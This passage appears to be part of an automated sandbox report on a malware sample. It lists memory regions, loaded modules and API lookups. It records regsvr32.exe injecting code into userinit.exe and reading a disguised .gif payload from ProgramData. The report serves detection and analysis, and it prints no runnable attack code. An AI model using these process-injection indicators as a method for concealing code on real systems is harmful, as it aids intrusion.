private_0x00000000026b0000	0x026b0000	0x0277efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02784fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02788fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0278cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02792fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02796fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0279afff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0279efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027a4fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027a8fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027acfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027b2fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027b6fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027bafff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x027bffff	Private Memory	-	-
private_0x0000000002780000	0x02780000	0x02850fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02866fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0286afff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0286efff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02884fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02888fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0288cfff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02890fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028a6fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028aafff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028aefff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028c4fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028c8fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028ccfff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x02932fff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x02950fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x02992fff	Private Memory	rw	-
private_0x00000000028b0000	0x028b0000	0x029b0fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029e2fff	Private Memory	rwx	-
private_0x00000000029f0000	0x029f0000	0x02aeffff	Private Memory	-	-
private_0x0000000002bb0000	0x02bb0000	0x02caffff	Private Memory	rw	-
private_0x0000000002d10000	0x02d10000	0x02d4ffff	Private Memory	rw	-
sortdefault.nls	0x02d50000	0x0301efff	Memory Mapped File	r	-
comctl32.dll	0x6d740000	0x6d7c3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d800000	0x6d818fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffd5008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0xb14, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d800000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d740000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ì, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d77266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d772542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d771d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d77238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7720c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d771fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d771e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d771f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d771ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d77216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7722be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7721e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8020ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8020b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8020c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8020d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 1118191	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #65: userinit.exe

222

0

»

Information	Value
ID	#65
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:04:19, Reason: Child Process
Unmonitor	End Time: 00:04:22, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0xaf0
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x AF8 0x B88 0x B8C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x00050fff	Private Memory	rw	-
private_0x0000000000060000	0x00060000	0x0015ffff	Private Memory	rw	-
private_0x0000000000160000	0x00160000	0x00160fff	Private Memory	rwx	-
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	rw	-
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	r	-
private_0x0000000000220000	0x00220000	0x0027ffff	Private Memory	rw	-
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	rw	-
private_0x0000000000240000	0x00240000	0x0027ffff	Private Memory	rw	-
oleaccrc.dll	0x00280000	0x00280fff	Memory Mapped File	r	-
userinit.exe	0x00290000	0x00298fff	Memory Mapped File	rwx	-
pagefile_0x00000000002a0000	0x002a0000	0x00367fff	Pagefile Backed Memory	r	-
private_0x0000000000370000	0x00370000	0x003effff	Private Memory	rw	-
private_0x00000000003f0000	0x003f0000	0x003f0fff	Private Memory	rwx	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000580000	0x00580000	0x00581fff	Pagefile Backed Memory	r	-
private_0x00000000005e0000	0x005e0000	0x005effff	Private Memory	rw	-
pagefile_0x00000000005f0000	0x005f0000	0x011effff	Pagefile Backed Memory	r	-
private_0x00000000011f0000	0x011f0000	0x012effff	Private Memory	-	-
private_0x0000000001350000	0x01350000	0x0135ffff	Private Memory	rw	-
private_0x0000000001360000	0x01360000	0x0157ffff	Private Memory	rw	-
pagefile_0x0000000001360000	0x01360000	0x0143efff	Pagefile Backed Memory	r	-
private_0x0000000001440000	0x01440000	0x0153ffff	Private Memory	rw	-
private_0x0000000001540000	0x01540000	0x0157ffff	Private Memory	rw	-
staticcache.dat	0x01580000	0x01eaffff	Memory Mapped File	r	-
pagefile_0x0000000001eb0000	0x01eb0000	0x022a2fff	Pagefile Backed Memory	r	-
private_0x00000000022b0000	0x022b0000	0x023bcfff	Private Memory	rw	-
private_0x00000000023c0000	0x023c0000	0x025bffff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02640fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02644fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02648fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x0264cfff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02652fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02656fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x0265afff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x0265efff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02664fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02668fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x0266cfff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02672fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02676fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x0267afff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x0267efff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02684fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02688fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x0268cfff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02692fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x02696fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x0269afff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x0269efff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026a4fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026a8fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026acfff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026b2fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026b6fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026bafff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026befff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026c4fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026c8fff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026ccfff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x026d2fff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x026d6fff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x026dafff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x026defff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x026f4fff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x026f8fff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x026fcfff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x02700fff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x02716fff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x0271afff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x0271efff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02734fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02738fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0273cfff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02740fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02756fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0275afff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0275efff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x02774fff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x02778fff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x0277cfff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x02780fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02796fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0279afff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0279efff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027b4fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027b8fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027bcfff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027c0fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027d6fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027dafff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027dffff	Private Memory	-	-
private_0x00000000026e0000	0x026e0000	0x02770fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027b2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027d0fff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x02812fff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x02830fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02872fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02890fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028d2fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028f2fff	Private Memory	rwx	-
private_0x0000000002900000	0x02900000	0x029fffff	Private Memory	-	-
private_0x0000000002a40000	0x02a40000	0x02b3ffff	Private Memory	rw	-
private_0x0000000002bd0000	0x02bd0000	0x02c0ffff	Private Memory	rw	-
sortdefault.nls	0x02c10000	0x02edefff	Memory Mapped File	r	-
comctl32.dll	0x6d6b0000	0x6d733fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d820000	0x6d838fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
